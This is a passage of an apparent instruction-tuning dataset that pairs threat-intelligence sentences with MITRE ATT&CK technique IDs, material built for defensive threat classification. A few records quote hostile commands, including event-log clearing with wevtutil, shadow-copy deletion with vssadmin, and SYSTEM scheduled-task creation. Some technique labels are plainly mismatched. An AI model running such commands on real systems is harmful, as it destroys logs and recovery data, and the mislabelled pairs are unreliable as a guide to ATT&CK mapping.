MITRE ATT&CK framework.,Anchor can self delete its dropper after the malware is successfully deployed.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In others, an adversary may deploy a new container configured without network rules, user limitations, etc.### Assistant: T1610: Deploy Container" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used kill dates in their malware to guardrail execution.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec can obtain a process list from the victim.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has used an IRC channel for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT has decrypted and loaded the gh0st RAT DLL into memory, once the initial dropper executable is launched.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has a module that can proxy C2 communications.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used Dropbox for C2 allowing upload and download of files as well as execution of arbitrary commands.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some variants of FakeM use SSL to communicate with C2 servers.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has attempted to lure victims into enabling malicious macros within email attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Doki was executed through an open Docker daemon API port.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BabyShark has cleaned up all files associated with the secondary payload execution.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer can enumerate remote computers in the compromised network.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar gathers information on the system and local drives.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DLL side-loading has been used to execute BBSRAT through a legitimate Citrix executable, ssonsvr.exe.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once the second DLL is executed, it gathers information about the victim system’s setup, such as operating system version, and driver and processor information### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used a batch script that adds a Registry Run key to establish malware persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The daemon name may be disguised by using a name from a related operating system or benign software Masquerading.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mosquito runs whoami on the victim’s machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has encrypted an ELF file.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig has been signed with self signed digital certificates mimicking a legitimate software company.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NavRAT writes multiple outputs to a TMP file using the >> method.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has used Remote Desktop Protocol to conduct lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search public digital certificate data for information about victims that can be used during targeting.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT has the ability to respawn itself using ShellExecuteW and CreateProcessW.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CORESHELL C2 messages are encrypted with custom stream ciphers using six-byte or eight-byte keys.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor has automatically collected data about the compromised system.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNSPOT enumerated the Orion software Visual Studio solution directory path.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer injects its communication module into an Internet accessible process through which it performs C2.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 used a batch script to gather folder and file names from victim hosts.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerDuke has a command to list the victim's processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy uses cmd.exe to execute commands on the system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sakula calls cmd.exe to run various DLL files via rundll32.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can use PowerShell to add files to the Windows Defender exclusions list.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware uses multiple types of encryption and encoding in its malware files, including AES, Caracachs, RC4, basic XOR with constant 0xA7, and other techniques.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can inject its backdoor as a portable executable into a target process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has performed DLL search order hijacking to execute their payload.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda can take screenshots of the victim’s machine.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LockerGoga has encrypted files, including core Windows OS files, using RSA-OAEP MGF1 and then demanded Bitcoin be paid for the decryption key.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may buy, steal, or download exploits that can be used during targeting.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT can launch a command shell interface for executing commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has exploited or attempted to exploit Zerologon and EternalBlue vulnerabilities.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT captures screenshots of the infected system using the gdi32 library.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can communicate with C2 via HTTP POST requests.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used brute force techniques to attempt account access when passwords are unknown or when password hashes are unavailable.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy also runs the systeminfo command to gather system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring Application Access Token.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla surveys a system upon check-in to discover Group Policy details using the gpresult command.### Assistant: T1615: Group Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This shortcut file points to the path of the previously written ‘winhelp.cpl’ file### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This user action will typically be observed as follow-on behavior from Spearphishing Attachment.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 15: Structure used to send data to server Figure 16: Structure used to send data to C2 server The structure is converted to Base64 using the CryptBinaryToStringA function### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has made use of Python-based remote access tools.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SideTwist has primarily used port 443 for C2 but can use port 80 as a fallback.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan relies on web shells for an initial foothold as well as persistence into the victim's systems.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used networkdll for network discovery and psfin specifically for financial and point of sale indicators.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Babuk has the ability to unpack itself into memory using XOR.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In one instance we observed, one of the initial malware delivered to the victim, RATANKBA (TROJ_RATANKBA.A), connects to a legitimate but compromised website (eye-watch[.]in:443, a mobile application-selling site) from which a hack tool (nbt_scan.exe) is also downloaded### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can delete .LNK files created in the Startup folder.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows uses access tokens to determine the ownership of a running process.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind can delete itself or specified files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest exfiltrates targeted file extensions in the /Users/ folder to the command and control server via unencrypted HTTP.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,the PowerShell is executed using reflectively loaded ReflectivePicker from the Empire project### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobian RAT uses DNS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Calisto has the capability to use rm -rf to remove folders and files from the victim's machine.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy has a command to launch a file browser or explorer on the system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SeaDuke is capable of uploading and downloading files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse specific file formats to subvert Mark-of-the-Web controls.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may hijack a legitimate user's SSH session to move laterally within an environment.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can obtain information about process integrity levels.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables.### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has deleted dropper files on an infected system using command scripts.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent can collect data and files from a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has been executed via Microsoft Word documents containing malicious macros.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI can delete files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL achieves persistence by adding itself to the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The email address is associated with the Lebanese domain of a major global financial institution### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer can gather information about TCP connection state.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,What does the Poseidon Group do? What happens after a target machine is infected? Once the target’s machine is compromised, the attacker first enumerates all processes running in the system and all services### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent has sent data related to a compromise host over its C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can capture screenshots of the victim’s machines.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Symantec determined a more accurate picture of Buckeye’s targets by looking at where Buckeye remained active on the network longer than a day, deployed additional tools, and spread onto multiple computers### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may compromise email accounts that can be used during targeting.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID can query LDAP to identify additional users on the network to infect.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used certutil to download additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can identify the IP and port numbers for all remote connections from the compromised host.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BACKSPACE may collect information about running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has lured users to click links to malicious HTML applications delivered via spearphishing emails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The event logs can be cleared with the following utility commands: * wevtutil cl system * wevtutil cl application * wevtutil cl security These logs may also be cleared through other mechanisms, such as the event viewer GUI or PowerShell.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also leveraged default manufacturer's passwords to gain initial access to corporate networks via IoT devices such as a VOIP phone, printer, and video decoder.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search private data from threat intelligence vendors for information that can be used during targeting.### Assistant: T1597: Search Closed Sources" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth can abuse alternate data streams to store content for malicious payloads.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has enumerated files on a compromised host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used DNS for C2 including the publicly available requestbin.net tunneling service.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Uroburos uses a custom packer.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Users must explicitly ask to show the hidden files either via a series of Graphical User Interface prompts or with command line switches .### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used WebDAV to upload stolen USB files to a cloud drive.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EWM injection is a method of executing arbitrary code in the address space of a separate live process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has used msiexec to install the Machete malware.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The launcher module, obfuscated with the notorious Metasploit’s shikata_ga_nai encoder, is the same for all the droppers### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the executing process is set to run at a specific time or during a certain event then this technique can also be used for persistence.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used local account credentials found during the intrusion for lateral movement and privilege escalation.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Deep Panda group is known to utilize WMI for lateral movement.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On macOS systems the dscl -create command can be used to create a local account.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Melcoz can monitor the clipboard for cryptocurrency addresses and change the intended address to one controlled by the adversary.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Create a process by impersonating a logged-on user Getting a user token using WTSQueryUserToken### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can use Data Protection API to encrypt its components on the victim’s computer, to evade detection, and to make sure the payload can only be decrypted and loaded on one specific compromised computer.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic uses the net view command on the victim’s machine.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor contains functionality to query the local/system time.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP.### Assistant: T1216: Signed Script Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These four were then all modified on the same date and time on October 13, 2018 08:21### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has encrypted traffic with the C2 to prevent network detection.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke can copy files and directories from a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can scan for open ports including TCP ports 135 and 1433.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FLIPSIDE is a simple proxy that creates an outbound RDP connection.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,injects a malicious DLL into the IExplorer.exe process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Business and government personnel who are traveling, especially in a foreign country, often rely on systems to conduct business other than those at their home office, and may be unfamiliar with threats posed while abroad### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Plist files are used by macOS applications to store properties and configuration settings for applications and services.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum can collect computer name, locale information, and information about the OS and architecture.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kasidet creates a Registry Run key to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used scheduled tasks to invoke Cobalt Strike including through batch script schtasks /create /ru ""SYSTEM"" /tn ""update"" /tr ""cmd /c c:\windows\temp\update.bat"" /sc once /f /st and to maintain persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After compromising a victim, Poseidon Group discovers all running services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PROMETHIUM has used Registry run keys to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT used TLS to encrypt communications over port 143 RTM used Port 44443 for its VNC module.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This behavior is related to and may take advantage of DLL Search Order Hijacking.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN10 has moved laterally using the Local Administrator account.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee gathers a list of processes using the tasklist command and then is sent back to the control server.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpicyOmelette has been distributed via emails containing a malicious link that appears to be a PDF document.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used tools to collect the computer name, OS version, installed hotfixes, as well as information regarding the memory and processor on a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Felismus collects the current username and sends it to the C2 server.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avenger has the ability to download files from C2 to a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use Valid Accounts to log into remote machines using Secure Shell .### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For instance, when using this string we observed DNS queries for “apple-search.infoclose”, as the string “close” was supposed to be the next portion of the C2 URL### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher is heavily obfuscated in many ways, including through the use of spaghetti code in its functions in an effort to confuse disassembly programs.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has used vssadmin Delete Shadows /all /quiet to to delete volume shadow copies and vssadmin resize shadowstorage to force deletion of shadow copies created by third-party applications.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The dropper installs 2 files:netwf.bat : executes netwf.dllnetwf.dll : the payloadThe dropper implements 2 persistence mechanisms:HKCU\Environment\UserInitMprLogonScript to execute the netwf.bat fileCOM Object hijack of the following CLSID: {BCDE0395-E52F-467C-8E3D-C4579291692E}, the CLSID of the class MMDeviceEnumerator.These 2 techniques have also been previously used by this actor.Finally the payload is executed by rundll32.exe (and the ordinal #1 in argument) or by explorer.exe if the COM Object hijack is performed### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Explosive has leveraged its keylogging capabilities to gain access to administrator accounts on target servers.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,while making connection with the C2, hindering detection efforts.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 uses two utilities, GETMAIL and MAPIGET, to steal email.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live for a DNS resource record.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious rules commonly filter out emails based on key words found in message bodies and subject lines.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can download a hosted ""beacon"" payload using BITSAdmin.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team researched Ukraine's unique legal entity identifier , including running queries on the EDRPOU website, in preparation for the NotPetya attack.### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kasidet has the ability to change firewall settings to allow a plug-in to be downloaded.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.### Assistant: T1052: Exfiltration Over Physical Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer downloads a shellcode payload from a remote C2 server and loads it into memory.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Axiom actors have been known to use the Sticky Keys replacement within RDP sessions to obtain persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can capture clipboard data from a compromised host.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This IP also belongs to the same service provider and class B network range as another IP we had associated with DarkHydrus, 107.175.150[.]113 which specifically resolved to a domain name containing a victim organization’s name### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rising Sun can send data gathered from the infected machine via HTTP POST request to the C2.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EKANS can determine the domain of a compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BadPatch uses SMTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linfo creates a backdoor through which remote attackers can delete files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK 